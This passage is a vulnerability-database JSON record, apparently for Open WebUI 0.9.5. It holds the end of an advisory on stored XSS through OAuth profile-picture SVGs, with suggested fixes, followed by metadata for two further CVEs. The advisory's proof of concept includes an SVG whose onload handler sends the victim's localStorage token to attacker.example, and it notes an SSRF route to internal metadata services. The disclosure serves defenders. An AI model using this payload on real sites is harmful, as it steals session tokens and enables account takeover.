(new-user signup) writes via `Users.update_user_profile_image_url_by_id` and `Auths.insert_new_auth`, both of which call SQLAlchemy directly (`models/users.py:575-588`) without going through any Pydantic model. The SVG data URI lands in the DB unchallenged.\n\n## 3. Endpoint serves attacker-controlled MIME with `inline` disposition\n\n`backend/open_webui/routers/users.py:504-528` — `get_user_profile_image_by_id`:\n\n```python\nheader, encoded = image.split(\",\", 1)\nmedia_type = header.split(\";\")[0].lstrip(\"data:\") # \"image/svg+xml\"\ndata = base64.b64decode(encoded)\nreturn StreamingResponse(\n iter([data]),\n media_type=media_type,\n headers={\"Content-Disposition\": \"inline\"},\n)\n```\n\nNo MIME whitelist. The route requires `get_verified_user` — any authenticated user reaches it.\n\n## 4. No default CSP / nosniff\n\n`backend/open_webui/utils/security_headers.py:16-61` populates headers only when the operator sets the corresponding env var. The default deployment returns none of these. Browsers render a top-level `image/svg+xml` response as an XML document and execute embedded script.\n\n# PoC\n\n**Prerequisites**: operator has OAuth signup enabled (`ENABLE_OAUTH_SIGNUP=true`) or OAuth login with picture sync (`OAUTH_UPDATE_PICTURE_ON_LOGIN=true`). The attacker has a valid identity on the configured IdP and can set their profile picture URL.\n\n1. Attacker hosts a malicious SVG at `https://attacker.example/p.svg`:\n\n```xml\n<svg xmlns=\"http://www.w3.org/2000/svg\"\n onload=\"fetch('https://attacker.example/x?c='+encodeURIComponent(localStorage.getItem('token')))\" />\n```\n\n2. Attacker sets their IdP profile picture to that URL and signs in to Open WebUI via OAuth. Signup (or login with picture sync) stores `data:image/svg+xml;base64,...` in the attacker's `profile_image_url`.\n\n3. Attacker shares a link to their own profile image with a victim in a chat DM or channel:\n\n```\nhttps://target.example/api/v1/users/<attacker-user-id>/profile/image\n```\n\n4. The authenticated victim clicks the link. The browser receives `Content-Type: image/svg+xml` with `Content-Disposition: inline`, renders the SVG as a top-level document, fires `onload`, and exfiltrates the victim's JWT. Attacker uses the JWT to take over the victim's account.\n\n# Impact\n\n- Account takeover of any authenticated user who opens the crafted URL.\n- Post-takeover: access to the victim's chats, API keys stored in their settings, and — if the victim has `workspace.tools` permission — RCE via installed tools (per CVE-2025-64496 analysis).\n- The same `_process_picture_url` function has no SSRF allowlist; a secondary primitive is to point the `picture` claim at an internal URL (metadata service, internal admin panel) and read the response bytes via the profile image endpoint.\n\n# Suggested fix\n\n1. In `_process_picture_url` (`utils/oauth.py:1336-1345`): reject any MIME outside `{image/png, image/jpeg, image/gif, image/webp}`. Use the upstream `Content-Type` response header, not the URL extension. Also add an SSRF allowlist or at minimum block RFC1918 / link-local / loopback targets.\n\n2. In `get_user_profile_image_by_id` (`routers/users.py:504-528`): enforce a MIME whitelist before building `StreamingResponse`. This is the defense-in-depth layer that should have caught the bypass.\n\n3. Apply `validate_profile_image_url` at the model/storage layer (`Users.update_user_profile_image_url_by_id`), not only at the Pydantic form layer. All write paths to the profile image column should go through the same validator.\n\n4. Set `X-Content-Type-Options: nosniff` and a default CSP unless the operator explicitly disables them.\n\n# References\n\n- `backend/open_webui/utils/oauth.py:1318-1351` — MIME guess + fetch\n- `backend/open_webui/utils/oauth.py:1536-1574` — OAuth write path\n- `backend/open_webui/utils/validate.py:10-36` — validator (bypassed)\n- `backend/open_webui/models/users.py:575-588` — DB write\n- `backend/open_webui/routers/users.py:504-528` — serving endpoint\n- `backend/open_webui/utils/security_headers.py:16-61` — env-gated headers\n- CVE-2025-64496 — precedent: trust boundary error (same class)\n- CVE-2025-64495 — precedent: rich-text XSS (same class)", "references": [ { "reference_url": "https://github.com/open-webui/open-webui", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/open-webui/open-webui" }, { "reference_url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-3wgj-c2hg-vm6q", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-3wgj-c2hg-vm6q" }, { "reference_url": "https://github.com/advisories/GHSA-3wgj-c2hg-vm6q", "reference_id": "GHSA-3wgj-c2hg-vm6q", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3wgj-c2hg-vm6q" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/375366?format=api", "purl": "pkg:pypi/open-webui@0.9.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5" } ], "aliases": [ "GHSA-3wgj-c2hg-vm6q" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ef1t-pxjm-j7cz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/70043?format=api", "vulnerability_id": "VCID-hj5f-yk3y-ffdg", "summary": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, when setting model permissions so that a group has read access to it, intending for other users to use it, those users also can read the model's system prompt. However users may consider their system prompt confidential, so this is considered a security issue. This vulnerability is fixed in 0.9.5.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45387", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07958", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07953", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07928", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07963", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45387" }, { "reference_url": "https://github.com/open-webui/open-webui", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/open-webui/open-webui" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45387", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45387" }, { "reference_url": "https://github.com/advisories/GHSA-h2cw-7qw9-56xr", "reference_id": "GHSA-h2cw-7qw9-56xr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-h2cw-7qw9-56xr" }, { "reference_url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-h2cw-7qw9-56xr", "reference_id": "GHSA-h2cw-7qw9-56xr", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T21:08:24Z/" } ], "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-h2cw-7qw9-56xr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/375366?format=api", "purl": "pkg:pypi/open-webui@0.9.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5" } ], "aliases": [ "CVE-2026-45387", "GHSA-h2cw-7qw9-56xr" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hj5f-yk3y-ffdg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/69825?format=api", "vulnerability_id": "VCID-yug9-shts-kufb", "summary": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, the POST /api/v1/evaluations/feedback endpoint in Open WebUI v0.9.2 is vulnerable to mass assignment via FeedbackForm, which uses model_config = ConfigDict(extra='allow'). Due to an insecure dictionary merge order in insert_new_feedback(), an authenticated attacker can inject a user_id field in the request body that overwrites the server-derived value, creating feedback records attributed to any arbitrary user. This corrupts the model evaluation leaderboard (Elo ratings) and enables identity spoofing. This vulnerability is fixed in 0.9.5.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45396", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13588", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13562", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13467", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00043", "scoring_system": "epss", "scoring_elements": "0.13586", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45396" }, { "reference_url": "https://github.com/open-webui/open-webui", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/open-webui/open-webui" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45396", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45396" }, { "reference_url": "https://github.com/advisories/GHSA-rjmp-vjf2-qf4g", "reference_id": "GHSA-rjmp-vjf2-qf4g", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rjmp-vjf2-qf4g" }, { "reference_url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g", "reference_id": "GHSA-rjmp-vjf2-qf4g", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T22:16:35Z/" } ], "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/375366?format=api", "purl": "pkg:pypi/open-webui@0.9.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5" } ], "aliases": [ "CVE-2026-45396", "GHSA-rjmp-vjf2-qf4g" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-yug9-shts-kufb" } ], "risk_score": null, "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5" }